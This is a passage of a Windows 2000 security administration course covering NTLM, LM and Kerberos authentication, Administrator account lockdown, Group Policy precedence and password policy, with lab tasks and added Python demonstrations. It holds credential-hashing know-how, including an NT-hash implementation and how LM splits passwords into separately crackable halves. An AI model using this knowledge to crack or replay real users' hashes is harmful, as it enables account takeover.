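         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[j] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTLM (NT) hash: case preserved, no 14-character limit, no salt."""
    return md4(password.encode("utf-16le"))


def lm_halves(password: str):
    """LM pre-processing only (the DES step is omitted): upper-case, truncate to 14
    bytes, pad with NULs, split into two independent 7-byte DES keys. A second half
    that is all NULs (7 characters or fewer) always hashes to AAD3B435B51404EE, so a
    short password is visible in the stored LM hash before any cracking starts."""
    raw = password.upper().encode("ascii", "replace")[:14].ljust(14, b"\x00")
    return raw[:7], raw[7:]


def lm_work_bits(charset_size: int = 69):
    """log2 of brute-force work for one 14-character secret versus the two 7-character
    halves LM actually exposes. 69 = 26 upper-case letters, 10 digits and 33 printable
    symbols; pass 26 to reproduce the letters-only figures used in the text."""
    return math.log2(charset_size ** 14), math.log2(2 * charset_size ** 7)


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 response key: HMAC-MD5 keyed with the NT hash over UPPER(user) || domain."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def client_response(password: str, user: str, domain: str, server_challenge: bytes,
                    client_nonce: bytes, timestamp: int = 0) -> bytes:
    """Client side of the challenge/response. The password never leaves the client;
    only an HMAC over the server's challenge and a client blob does. The blob here is a
    simplified version of the MS-NLMP structure (version, timestamp, client nonce)."""
    blob = b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_nonce + b"\x00" * 4
    key = ntowf_v2(nt_hash(password), user, domain)
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest() + blob


def server_verify(stored_nt: bytes, user: str, domain: str, server_challenge: bytes,
                  response: bytes) -> bool:
    """Server side: recompute the proof from the stored NT hash alone. The plaintext
    password is never needed, which is why the stored hash must be protected as
    carefully as the password itself."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(expected, proof)


def demo():
    """Constructed sample: fictitious user 'jsmith' in fictitious domain 'SCNPDOMAIN'."""
    user, domain, password = "jsmith", "SCNPDOMAIN", "MyPasswordIsLong"
    stored = nt_hash(password)             # what the account database holds
    challenge = os.urandom(8)              # step 2 of the exchange: the server's challenge
    response = client_response(password, user, domain, challenge, os.urandom(8))
    accepted = server_verify(stored, user, domain, challenge, response)
    replayed = server_verify(stored, user, domain, os.urandom(8), response)  # new challenge, old response
    return accepted, replayed


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("LM halves of 'MyPasswordIsLong':", lm_halves("MyPasswordIsLong"))
    print("LM work, letters only, full vs split (bits):", [round(v, 1) for v in lm_work_bits(26)])
    print("NTLMv2 accepted / replay accepted:", demo())
```

Two things to notice when you run it: the LM halves of the text's example come out as MYPASSW and ORDISLO, each a separate cracking target, and the replayed response is rejected because the server's fresh challenge is part of every HMAC. Nothing in server_verify touches a plaintext password, which is the practical meaning of "the hash is a password-equivalent."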

Windows 2000 Local Logon Process

There are two methods used when you log on to a Windows 2000 Server or Professional computer locally. The two authentication methods are Kerberos and NTLM. Kerberos is the main method, and in the event that Windows cannot find a KDC (Key Distribution Center), or the account is a local one, Windows uses NTLM for authentication to the local machine, using the local SAM (Security Accounts Manager) database.

The process of logging on to the local system, using NTLM is:

1. A user enters his or her user name and password. These credentials are collected by the Graphical Identification and Authentication (GINA) component of Windows.

2. GINA hands off the entered information to the Local Security Authority (LSA) for authentication. The LSA is what creates the access tokens, provides an interactive environment for user authentication, controls the local security policy, and sends authentication requests to NTLM or Kerberos, as required.

3. LSA then hands off the information through the SSPI to the NTLM authentication package, MSV1_0 (msv1_0.dll). (At this stage, if Kerberos is being used, SSPI would hand off to the Kerberos package instead.)

4. For a local account, MSV1_0 checks the credentials directly against the local SAM database. For a domain account that must fall back to NTLM, it uses the Netlogon service to pass the request through to a domain controller.

Kerberos in Windows 2000

If you have a Windows 2000 domain up and running, and you want to implement Kerberos, all you have to do is nothing! Kerberos will be used by default to authenticate network clients (who must be running Windows 2000) logging on to a Windows 2000 domain.

Kerberos is an IETF standard used for authentication. It was developed at the Massachusetts Institute of Technology during the 1980s. As an authentication method, it is considered to be secure and had been implemented in OSs before the Windows 2000 implementation. There is a bit of controversy in the method used in Windows systems, as it varies slightly from the standard created by MIT. However, it should be noted that Windows 2000 is able to interoperate with non-Windows 2000 machines running Kerberos.

Although it is beyond the scope of this course to get into the details of Kerberos operation, you should be familiar with the fundamental issues of its function for authentication purposes.

When a user begins the logon process by entering their credentials (a username and password, a smart card, or biometrics), Windows contacts an Active Directory domain controller, which hosts the Kerberos Key Distribution Center (KDC). The Authentication Server (AS) inside the KDC is what performs the actual authentication. The KDC responds by issuing a Ticket Granting Ticket (TGT) to the authenticated user. The TGT carries identification information about the user that the KDC can later verify, and it is used to gain further access in the network.

Once the user account has been authenticated, the TGT is used to request further Kerberos tickets in order to access network services. The component that provides the tickets for the network resources to the authenticated client is called the Ticket Granting Server (TGS).

To summarize:

• An Authentication Server (AS) is used to perform the actual authentication of the Kerberos client. In a Windows 2000 implementation, this is configured as a service called the Authentication Service.

• The Ticket Granting Server (TGS) is what creates the actual tickets for the client to use in accessing authorized resources. In a Windows 2000 implementation, this is configured as a service called the Ticket Granting Service.

• The Key Distribution Center (KDC) in a Windows 2000 implementation runs on every domain controller and contains both the Authentication Service and the Ticket Granting Service.


One of the benefits to end-users of a network running Kerberos is that Single Sign On (SSO) can be maintained. With SSO, users are not required to authenticate with each network resource they want to access, and because Windows 2000 trusts are transitive, once a user logs on to one domain he or she will have access to authorized resources in the other domains in the forest. Another key benefit of Kerberos is mutual authentication: the service proves its identity to the client as well, and because every ticket carries a session key shared only between the client and that service, messages protected with the key can be tied to the user who obtained the ticket. In a Kerberos network, if a message says it came from User A, you can be very confident it did indeed come from User A.
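The following Python program is an added example written for this edition; it is not code from the course, from MIT Kerberos or from Windows. It acts out the exchange described above with a single KDC object playing both the Authentication Service and the Ticket Granting Service, a client that logs on once and then uses its TGT (never its password) to obtain a service ticket, and a file service that validates the ticket with its own key without contacting the KDC. Real Kerberos encryption types are replaced by a toy encrypt-then-MAC construction (SHA-256 keystream plus HMAC-SHA256) that is only there to make the protocol runnable; the user, password and service name are constructed, and pre-authentication, ticket flags and renewal are left out.

```python
import hashlib
import hmac
import json
import os
import time


def _xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Keystream from SHA-256(key || nonce || counter), XORed over data."""
    out = bytearray()
    for counter in range((len(data) + 31) // 32):
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
    return bytes(p ^ k for p, k in zip(data, out))


def seal(key: bytes, obj: dict) -> bytes:
    """Toy encrypt-then-MAC (stream XOR + HMAC-SHA256) standing in for a Kerberos
    encryption type. Good enough to show the protocol; not a real etype."""
    nonce = os.urandom(16)
    ct = _xor_stream(key, nonce, json.dumps(obj).encode())
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> dict:
    """Raises ValueError when the key is wrong or the blob was modified."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("integrity check failed")
    return json.loads(_xor_stream(key, nonce, ct))


def user_key(password: str) -> bytes:
    """Stand-in for the string-to-key derivation of the user's long-term key."""
    return hashlib.sha256(password.encode("utf-16le")).digest()


class KDC:
    """One process holding both roles the text describes: the Authentication
    Service (AS) that issues TGTs and the Ticket Granting Service (TGS) that
    issues service tickets. TGTs are sealed under the KDC's own krbtgt key."""

    def __init__(self, long_term_keys: dict, lifetime: int = 600):
        self.keys = long_term_keys            # principal name -> long-term key
        self.krbtgt = os.urandom(32)          # known only to the KDC
        self.lifetime = lifetime

    def as_exchange(self, user: str):
        """AS-REQ/AS-REP (pre-authentication omitted): the TGT plus a copy of the
        session key that only the holder of the user's key can open."""
        sk = os.urandom(32)
        tgt = seal(self.krbtgt, {"client": user, "sk": sk.hex(), "expires": time.time() + self.lifetime})
        return tgt, seal(self.keys[user], {"sk": sk.hex()})

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, service: str):
        """TGS-REQ/TGS-REP: check the TGT and the authenticator, then issue a ticket
        sealed under the service's long-term key. The user's password is not involved."""
        t = unseal(self.krbtgt, tgt)
        if t["expires"] < time.time():
            raise ValueError("TGT expired")
        if unseal(bytes.fromhex(t["sk"]), authenticator)["client"] != t["client"]:
            raise ValueError("authenticator does not match TGT")
        svc_sk = os.urandom(32)
        ticket = seal(self.keys[service], {"client": t["client"], "sk": svc_sk.hex(),
                                           "expires": time.time() + self.lifetime})
        return ticket, seal(bytes.fromhex(t["sk"]), {"sk": svc_sk.hex(), "service": service})


def client_logon(kdc: KDC, user: str, password: str):
    """Interactive logon: obtain a TGT. A wrong password fails here, at unseal()."""
    tgt, enc = kdc.as_exchange(user)
    return tgt, bytes.fromhex(unseal(user_key(password), enc)["sk"])


def client_access(kdc: KDC, user: str, tgt: bytes, sk: bytes, service: str):
    """Single sign-on: use the TGT, not the password, to get a ticket for a service."""
    ticket, enc = kdc.tgs_exchange(tgt, seal(sk, {"client": user, "time": time.time()}), service)
    svc_sk = bytes.fromhex(unseal(sk, enc)["sk"])
    return ticket, seal(svc_sk, {"client": user, "time": time.time()})


def service_accept(service_key: bytes, ticket: bytes, authenticator: bytes) -> bool:
    """The service validates the ticket with its own key and never talks to the KDC."""
    t = unseal(service_key, ticket)
    a = unseal(bytes.fromhex(t["sk"]), authenticator)
    return a["client"] == t["client"] and t["expires"] > time.time()


def demo():
    """Constructed principals: user 'jsmith' and a fictitious file server 'cifs/files01'."""
    svc_key = os.urandom(32)
    kdc = KDC({"jsmith": user_key("Tr0ub4dor!"), "cifs/files01": svc_key})
    tgt, sk = client_logon(kdc, "jsmith", "Tr0ub4dor!")
    ticket, auth = client_access(kdc, "jsmith", tgt, sk, "cifs/files01")
    accepted = service_accept(svc_key, ticket, auth)
    try:
        client_logon(kdc, "jsmith", "wrong-password")
        wrong_rejected = False
    except ValueError:
        wrong_rejected = True
    return accepted, wrong_rejected


if __name__ == "__main__":
    print("service accepted ticket, wrong password rejected:", demo())
```

The point to take from the run is where each secret is used: the password is touched once, at client_logon, to open the AS reply; every later step works from the TGT and session keys, which is what makes the single sign-on described above possible, and a service can check a ticket with nothing but its own long-term key.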

Smart Cards in Windows 2000

With the release of Windows 2000, Microsoft included built-in support for Smart Cards. Smart Cards add a physical component to authentication, which provides an additional layer of defense for the system.

Smart Cards in Windows 2000 utilize Kerberos and public key cryptography. Public key cryptography is asymmetric cryptography, meaning that there is one key for encryption and a different key for decryption. Together, the two are called the private/public key pair, or simply the key pair. The private key is known only to the owner and is never shared with the world. The public key is known to the world; it is publicly available. When Smart Cards are deployed in place of a password, the key pair is generated on or loaded onto the card, the private key never leaves the card, and the card proves possession of it during the Kerberos logon (the card's PIN unlocks the key rather than being sent anywhere).

TASK 4B-1
Configuring NTLMv2 Authentication

Setup: You are logged on to Windows 2000 as Administrator, and the Custom_GPO is open.

1. Under Security Settings, expand Local Policies, and select Security Options.

2. Double-click LAN Manager Authentication Level.

3. In the Local Policy Setting drop-down list, select Send NTLMv2 Response Only, and click OK.

4. Close the Custom_GPO, saving settings if you are prompted to do so. If you have authentication issues in later tasks, you can return the setting to Send LM And NTLM Responses. Note that Send NTLMv2 Response Only changes only what this computer sends as a client; the domain controllers still accept LM and NTLM from others. To stop down-level clients from authenticating with the weak responses, the servers must be set to one of the "refuse LM" or "refuse LM and NTLM" levels, and every client must be able to send NTLMv2 before you do so.


Topic 4C
Windows 2000 Security Configuration Tools

In Windows 2000, you are provided with a variety of tools and resources for the configuration and management of security options, for both individual computers and the network itself. These tools include the Security Templates Snap-In, the Security Configuration and Analysis Snap-In, and Secedit.exe. Secedit.exe is a command-line tool that can be used, among other things, for analyzing the security of many computers in a domain.

The Gold Standard

When configuring Windows 2000 to be a secure operating system, you will have many choices and configuration options. There are several different templates you can implement, as you will see shortly. In addition to the templates provided by Microsoft, there are other standards created by different organizations for securing the system. One of these is the Gold Standard. The Gold Standard was jointly developed by several organizations, including the NSA and NIST. In this section, you will see references to the Gold Standard, and you will use the Gold Standard template to check the security of your system against its recommendations.

User and Group Security

The focal point of Windows 2000 is just as it was in Windows NT 4.0: the users. Without users being able to access the network, there is no point in having a network. The creation of user accounts is something all Windows administrators must become familiar with, if they are not already.

There are two basic types of user accounts that can be created in Windows 2000:domain users and local users.

• A domain user account has the ability to log on to the network and access authorized resources throughout the domain.

• A local user account has the ability to log on to a specific computer and access authorized resources on that computer.

The accounts that exist when a Windows 2000 server is first installed are the Guest and Administrator accounts. Securing the Guest account should happen right away. The same steps that are used to secure the Guest account in Windows NT 4.0 can be used to secure this account in Windows 2000.

Restricting Logon Hours

Once you have created several user accounts, you should look into restricting the hours in which a user may log on successfully. This is a simple and effective control on user accounts: if your network is meant to provide access only during working hours, there is no reason to allow a user account 24x7 access to the network, and an attempt to use stolen credentials outside those hours fails and leaves a logon failure in the audit log.


Unfortunately, in the Windows 2000 Server management consoles, restricting logon hours can be done only for Domain (AD) users; however, the procedure for doing so is included here for your reference.

1. Open the MMC, and add the Active Directory Users And Computers Snap-in.

2. Select the Users folder, and double-click a User object that you want to restrict.

3. In the Properties dialog box, select the Account tab, and click Logon Hours.

4. Specify the necessary time and day restrictions.

5. Click OK to close the Logon Hours dialog box.

6. Click OK to close the User Properties and apply the settings.

Expiration Dates for User Accounts

In addition to setting restrictive hours for a user account, you can control access to network resources by defining a time limit for a user account. In other words, you are creating a user account that will expire.

Again, in Windows 2000 Server, this restriction is available only for Domain (AD) users. Here is the procedure, for your reference.

1. Open the MMC, and add the Active Directory Users And Computers Snap-in.

2. Select the Users folder, and double-click a User object that you want to restrict.

3. In the Properties dialog box, select the Account tab.

4. For the Account Expires option, select the End Of radio button, and enter the date on which you want the account to expire.

5. Click OK to close the User Properties and apply the changes.

Configuring Windows 2000 Groups

As you begin working with Windows 2000, you will most likely want to implement and configure a full Active Directory structure, to gain all the benefits afforded by doing so. However, when you first install a server, it is nothing more than a stand-alone server, not even part of a domain, let alone a domain controller.

After the machine has become a domain controller (you can do this by running DCPROMO), you will find that, as the administrator, there are several groups for you to manage. These include Domain Admins and Domain Users.

There are two basic group types: a Security group and a Distribution group. The Distribution group is used to manage lists, such as email lists, and will not be detailed in this course. We will focus on Security groups. These groups can contain users and other security groups, so there is quite a bit of flexibility in managing the network.


In Windows NT 4.0, you will recall that groups can be either global or local. In Windows 2000, that concept is expanded. In Windows 2000, the group scopes are:

• Computer Local: A machine-specific group used to provide access to resources on the local machine only. It cannot be created on a Domain Controller.

• Domain Local: A group that can have members from any domain in the network. These groups are created only on Domain Controllers, and can be used to provide resource access throughout the domain.

• Global: A group that is used to combine users who often have similar use and access requirements for network resources. Global groups can contain members only from the domain in which the group was created, and can be used to access resources in that domain as well as in other domains.

• Universal: Used in a multidomain environment where groups of users from different domains have similar resource use and access needs. In order to implement Universal groups, the domain must be running in native mode, meaning only Windows 2000 Domain Controllers are being used. This switch is usually made when all Windows NT 4.0 Domain Controllers have been upgraded to Windows 2000, and it cannot be reversed.

It is also possible to combine groups together, such as nesting Global groups in Universal groups, if that is required in your situation. There might be a resource you are trying to control access to, and several Global groups might exist that are already configured with the correct users. In this case, a Universal group will work for controlling access across the network. You can also place Universal groups in Domain Local groups and control access to the resource by placing permissions on the Domain Local group.

These groups are what you will use when controlling access to resources, both allowing and denying permissions based on your security needs. If you are trying to secure the computer, user, and network environments, you will use group policies, as introduced earlier.

Locking Down the Administrator Account

The Administrator account has four significant characteristics, from a security perspective:

• The name of the built-in administrator account is Administrator.

• This account can, during the installation process, be created with a blank password.

• This built-in administrator account is a member of the built-in Administrators group.

• The built-in administrator account cannot be locked out.

The chances are extremely high that anyone familiar with the Windows platform also knows these facts. Therefore, your first priority as an administrator should be to change the name of the built-in administrator account to something that does not sound so administrative and to give it a very strong password. Treat the rename as a speed bump rather than a control: the account's security identifier (SID) always ends in -500, so anyone who can enumerate SIDs can find it under any name. The strong password and the network-logon restriction described next carry the real weight.


You should also prohibit this account from logging on to the computer over the network. This might sound a bit counter-intuitive until you recall that this account does not get locked out, regardless of how strict an account lockout policy you use. For instance, if you implement an account lockout policy that locks out a user account after three bad logon attempts, every account other than the built-in administrator account obeys this policy, so the built-in account is the one an attacker can guess against indefinitely.

Now, in most organizations, important machines, such as file, print, authentication, Web, mail, and ftp servers, are housed in physically secure locations. Only network administrators are allowed into these areas. (If this is not the case in your organization, we recommend you start thinking hard about it.) If you can ensure physical security, then the only other way the servers can be attacked is via the network. The most powerful account on a server is the Administrator account. Every other administrative account can be protected against network password guessing by the lockout policy; the built-in one cannot. Therefore, it is recommended that this account not have the right to log on via the network, which you enforce by granting it the "Deny access to this computer from the network" user right, leaving it usable only at the console.

TASK 4C-1
Securing Administrator Account Access

Setup: You are logged on to Windows 2000 as Administrator.

1. Right-click My Computer, and choose Manage.

2. In the left pane, expand Local Users And Groups, and select the Users folder.

3. In the right pane, right-click the built-in administrator account (called Administrator) and choose Rename.

4. For the new account name, enter scnpXXX, where XXX is your seat number, such as L01 or R02.

The last three letters of your computer name should be your seat number. If you are unsure about your computer name, right-click My Computer and choose Properties, then click Network Identification. Your computer name will be listed for you. Or, you can open a command prompt and enter the ipconfig /all command—your host name is your computer name.

5. Right-click the scnpXXX account and choose Set Password.

6. Enter and confirm aA1234! and click OK twice.

7. In the right pane, right-click anywhere and choose New User.

8. For the new account name, enter Administrator to create a new account that looks like it is the built-in administrator account.

9. Enter the password bB5678! and confirm it.

10. Uncheck User Must Change Password At Next Logon.

11. Check User Cannot Change Password and Password Never Expires. Click Create, and then click Close to finish creating the new account.

physical security: The measures used to provide physical protection of resources against deliberate and accidental threats.


12. Right-click the new account that you just created, and choose Properties.

13. Select the Member Of tab.

14. Select the Users group and click Remove.

15. Click Apply, and then click Close.

16. In the right pane, right-click anywhere and choose New User.

17. For the new account name, enter scnpXXXb, and for the password, enter cC13579! and confirm it. Again, use your seat number in place of the Xs.

18. Uncheck User Must Change Password At Next Logon.

19. Click Create, and then click Close.

20. Right-click the new account that you just created, and choose Properties.

21. Select the Member Of tab.

22. Click the Add button, select the Administrators group, click Add, and click OK.

23. Select the Users group and click Remove.

24. Click Apply, and then click Close.

25. Open the Custom_GPO. If necessary, expand Local Computer Policy, Computer Configuration, Windows Settings, Security Settings, and Local Policies. Select User Rights Assignment.

26. In the right pane, locate and double-click the policy Deny Access To This Computer From The Network.

27. Click Add, then while holding down the Ctrl key, select the user accounts scnpXXX and Administrator. Click Add.

28. Click OK twice.

29. Double-click the policy Deny Logon Locally.

30. Click the Add button, select the user account Administrator, and click Add.

31. Click OK twice.

32. Close all windows. Save settings if you are prompted to do so.


Testing Administrative Access

You have renamed the built-in administrator account and configured it to be used only at the machine and not over the network. You have also created a dummy Administrator account that cannot log on locally, nor can it be used to access this machine over the network. And, you have created another administrator account. This is the administrator account that you should use on a day-to-day basis, as and when required; not the built-in account.

Now, let’s test the results of denying network access to this server for the built-in administrator account. We will create a folder and share it. Then we will configure this folder’s share permissions to allow Read access for the built-in administrator account. Finally, we will test this access from another machine on the network.

TASK 4C-2
Testing Administrative Access

Setup: You are logged on to Windows 2000 as Administrator.

1. Log off and try to log back on as Administrator. You should see a message stating that the local policy does not permit this account to log on.

2. Try to log on with the renamed Administrator account. This time, you should be able to log on successfully.

3. On your boot partition, create a folder called Newtest, and within this folder, create a text file named doc1.txt. Your boot partition is the partition that contains the Windows 2000 OS files.

4. Right-click the new folder, and choose Sharing.

5. Select Share This Folder, and click the Permissions button.

6. Select Everyone and click Remove.

7. Click the Add button, select the user accounts scnpXXX and scnpXXXb, and click Add. Then click OK three times.

8. From your neighbor’s computer, open the Run dialog box. (From the Start menu, choose Run.)

9. Enter \\your_computer’s_IP_address\newtest. You should receive a dialog box prompting you for a username and password.

10. Enter the name and password for the built-in administrator account. Remember, you changed the built-in administrator account to scnpXXX, with a password of aA1234!.

11. If you are prompted for credentials a second time, enter the same information. You should receive a pop-up error message informing you that a logon failure occurred as the user has not been granted the requested logon type at this computer.

Remember, you set a password for Administrator: bB5678!

Remember to include the computer name; for instance, STU-W2K-L01\scnpl01.


12. Click OK to close the error message.

13. This time, try logging on with the credentials for scnpXXXb. You should be successful.

14. Return to your own computer, and close any open windows.

Group Policies

In the previous section, you were introduced to Group Policy Objects and their creation. In this section, you will delve deeper into the usage of the GPO in securing the network. Two of the issues that must be discussed are the options associated with policy inheritance and overrides.

From the earlier discussion on Group Policy Objects, you should already be aware that the GPOs are implemented in the following order: local GPO, site GPO, domain GPO, and finally OU GPO. You also are aware of the fact that when there are multiple GPOs assigned to an object, the highest GPO on the list takes priority over the rest of the list.

You can change the order of implementation on this list by simply choosing a GPO and using the Up and Down buttons to reorder the list to suit your needs. However, you might need to have further control than what the Up and Down buttons provide to you.

Policy Inheritance

Policy inheritance is the name for the process of a user or computer inheriting the final policy configuration from multiple policies, depending on where the object may be in the Active Directory hierarchy and configured GPOs. To track the policies that might be implemented as a user logs on to a computer, use the following list:

1. A computer policy is enabled when the computer is first turned on, and is refreshed at default intervals.

2. A user policy is applied when a user logs on to the system and is refreshed at default intervals.

3. The local GPO is applied.

4. The site GPO is applied.

5. The domain GPO is applied.

6. The OU GPO is applied.

To keep this complexity in mind, remember that it is not uncommon for sites, domains, and OUs to have more than one GPO configured. It is also not uncommon for there to be conflicting settings in locations throughout the policies.

No Override

One of the methods for you to manage a GPO implementation is through the No Override option. This option is available on any site, domain, or OU GPO. When selected, this option means that none of the policy settings in this GPO can be overridden. In the event that more than one GPO is set to No Override, the highest GPO takes priority.


Block Inheritance

In addition to the No Override option, you have another choice for managing policy implementation. The other choice is called Block Policy Inheritance. This option is also available to any site, domain, or OU GPO. When selected, this option means that any policy that is higher will not be inherited, unless it has been designated with the No Override option. Enabling this option ensures that the settings of the current GPO will be implemented, and not the settings of a higher-level policy.

You must be very careful in the use of the No Override and Block Inheritance options. These choices, used with incomplete planning, can cause serious disruptions to the overall policies that are implemented throughout the organization.
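As an added illustration that is not part of the original course material, the following Python resolver models the precedence rules just described (local, site, domain, OU order; top-of-list priority; No Override; Block Inheritance) so you can see which GPO wins for each setting. The GPO names, policy names and values are constructed for the example.

```python
"""Resolver for the Group Policy precedence rules described above.

Constructed illustration, not Microsoft code. It follows the page's
description: GPOs are processed in the order local, site, domain, OU,
with later scopes overriding earlier ones; within one scope the GPO
highest in the list wins; a No Override GPO cannot be overridden by any
GPO processed after it (the highest such GPO takes priority); Block
Inheritance on a scope discards everything inherited from higher scopes
unless it came from a No Override GPO.
"""
from dataclasses import dataclass, field

SCOPE_ORDER = ("local", "site", "domain", "ou")


@dataclass
class GPO:
    name: str
    settings: dict            # {policy name: value}
    no_override: bool = False


@dataclass
class Scope:
    level: str                # one of SCOPE_ORDER
    gpos: list = field(default_factory=list)   # index 0 is the top of the list
    block_inheritance: bool = False


def resolve(scopes):
    """Return the effective policy as {policy: (value, name of winning GPO)}."""
    ordered = sorted(scopes, key=lambda s: SCOPE_ORDER.index(s.level))
    effective = {}
    locked = set()            # policies fixed by a No Override GPO higher up
    for scope in ordered:
        if scope.block_inheritance:
            # Keep only what a higher No Override GPO has already fixed.
            effective = {k: v for k, v in effective.items() if k in locked}
        # Apply from the bottom of the list upward so the top entry wins.
        for gpo in reversed(scope.gpos):
            for policy, value in gpo.settings.items():
                if policy not in locked:
                    effective[policy] = (value, gpo.name)
        # No Override GPOs in this scope beat its ordinary GPOs and lock their
        # settings against every scope processed after this one.
        for gpo in scope.gpos:
            if gpo.no_override:
                for policy, value in gpo.settings.items():
                    if policy not in locked:
                        effective[policy] = (value, gpo.name)
                        locked.add(policy)
    return effective


def example_scopes(domain_no_override):
    """Constructed scenario: a domain baseline, and an OU that blocks inheritance."""
    return [
        Scope("local", [GPO("Local", {"MinimumPasswordLength": "0",
                                      "AuditLogonEvents": "No auditing"})]),
        Scope("domain", [GPO("Domain-Baseline",
                             {"MinimumPasswordLength": "8",
                              "PasswordComplexity": "Enabled"},
                             no_override=domain_no_override)]),
        Scope("ou", [GPO("OU-Top", {"MinimumPasswordLength": "14"}),
                     GPO("OU-Bottom", {"MinimumPasswordLength": "6",
                                       "LockoutThreshold": "3"})],
              block_inheritance=True),
    ]


if __name__ == "__main__":
    for flag in (True, False):
        print(f"Domain-Baseline set to No Override: {flag}")
        for policy, (value, source) in sorted(resolve(example_scopes(flag)).items()):
            print(f"  {policy:24} = {value:12} (from {source})")
```

Run it both ways and note that with No Override on the domain baseline, the OU's Block Inheritance cannot lower the minimum password length to 14 or 6; without it, the top GPO in the OU list (14 characters) wins.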

Local Security Policy

Each and every Windows 2000 system on the network has what is called a local security policy. The local security policy is the grouping of security configurations that affect the local computer. These security configurations can define user and group rights and permissions, along with determining machine-specific security settings. In the following tasks, you will configure local security policy settings.

TASK 4C-3
Verifying Password Requirements

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open the Computer Management (Local) console.

2. Create three users named poluser1, poluser2, and poluser3.

3. Leave this console open.

4. From the Start menu, choose Programs→Administrative Tools→Local Security Policy.

5. Expand Account Policies, and select Password Policy.

6. In the right pane, double-click the Minimum Password Length policy.

7. Change the value for Password Must Be At Least to 4 characters, and click OK.

8. Leave the Local Security Settings MMC open.

9. Switch to the Computer Management (Local) console.

10. Right-click poluser1, and choose Set Password.

11. Enter 123 as the password, and confirm it.


12. Click OK. You should be presented with a pop-up warning informing you that an error occurred while attempting to set the password for that user. The new password (123) does not meet the password policy requirements.

13. Click OK to close the warning, and then set poluser1’s password as 1234. The password should now be accepted. Click OK.

14. Switch to the Local Security Settings MMC.

15. Double-click the Passwords Must Meet Complexity Requirements policy.

16. Change the setting for this policy to Enabled, and click OK.

17. Switch to the Computer Management MMC.

18. Right-click poluser2, and set the password as 1234.

19. Click OK. You should be presented with a pop-up warning informing you that an error occurred while attempting to set the password for that user. The new password (1234) does not meet the password policy requirements.

20. Click OK to close the warning, and then try setting the password as a123.

21. Click OK. You should again be presented with a pop-up warning informing you that an error occurred while attempting to set the password for that user. The new password (a123) still does not meet the password policy requirements. Let’s try again.

22. Click OK to close the warning, and then try using aA12 as the password.

23. Click OK. This time, the password should be accepted.

24. Click OK, and close all open windows.

Password Recommendations

In order to create a solid password, you should include a combination of alphanumeric characters, provided that the combination includes both upper- and lower-case letters, which will satisfy complexity requirements as stipulated by Microsoft’s policy designers. Interestingly, if you search for the definition for this policy in Microsoft’s TechNet, you will be provided information similar to what is shown in Figure 4-8.


Figure 4-8: A TechNet description of password complexity requirements.

This means that simply turning this policy on will not force users to use at least a six-character password. You have already proved this. Nor do you have to enter any of the non-alphanumeric characters. You can get away with using upper- and lower-case alphanumeric characters.
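To make the behaviour observed in Task 4C-3 concrete, here is an added Python model (not Microsoft code, and not part of the original course) of the two checks involved: the Minimum Password Length policy supplies the only length floor, and the complexity policy, as the task demonstrates, accepts any password drawing on at least three of the four character classes (upper, lower, digit, other). The policy values and test passwords are the ones used in the task.

```python
"""Model of the Windows 2000 password checks exercised in Task 4C-3.

Constructed example for this lesson, not Microsoft's password filter.
The minimum length comes from the 'Minimum Password Length' policy; the
'Passwords Must Meet Complexity Requirements' policy, as observed in the
task, demands characters from at least three of the four classes
(upper, lower, digit, other) and adds no length floor of its own.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class PasswordPolicy:
    minimum_length: int = 0            # Windows default is 0 characters
    complexity_required: bool = False  # Windows default is Disabled


def character_classes(password: str) -> set:
    """Return the set of character classes present in the password."""
    classes = set()
    for ch in password:
        if ch.isupper():
            classes.add("upper")
        elif ch.islower():
            classes.add("lower")
        elif ch.isdigit():
            classes.add("digit")
        else:
            classes.add("other")       # punctuation, symbols, whitespace
    return classes


def check_password(password: str, policy: PasswordPolicy) -> list:
    """Return the list of policy violations; an empty list means accepted."""
    problems = []
    if len(password) < policy.minimum_length:
        problems.append(
            f"shorter than the minimum length of {policy.minimum_length}")
    if policy.complexity_required and len(character_classes(password)) < 3:
        problems.append(
            "complexity: needs characters from at least 3 of the 4 classes "
            "(upper, lower, digit, other)")
    return problems


def is_accepted(password: str, policy: PasswordPolicy) -> bool:
    return not check_password(password, policy)


if __name__ == "__main__":
    # Replay the task: length floor of 4 with complexity off, then on.
    length_only = PasswordPolicy(minimum_length=4)
    with_complexity = PasswordPolicy(minimum_length=4, complexity_required=True)
    attempts = [("123", length_only), ("1234", length_only),
                ("1234", with_complexity), ("a123", with_complexity),
                ("aA12", with_complexity)]
    for pw, pol in attempts:
        verdict = check_password(pw, pol) or ["accepted"]
        print(f"{pw!r:8} complexity={pol.complexity_required!s:5} -> {verdict}")
```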

Security Templates

The prospect of configuring all the options in the GPO can be quite overwhelming at times. To help with defining how the security should be configured for given situations, Microsoft has included security templates that can be used in the Group Policy Editor.

These templates are INF files and can be opened with a text editor for viewing. Templates are stored in the %systemroot%\security\templates folder. Templates can be applied to a GPO, and any user or computer that is controlled by that GPO will be affected by the settings in the security template.

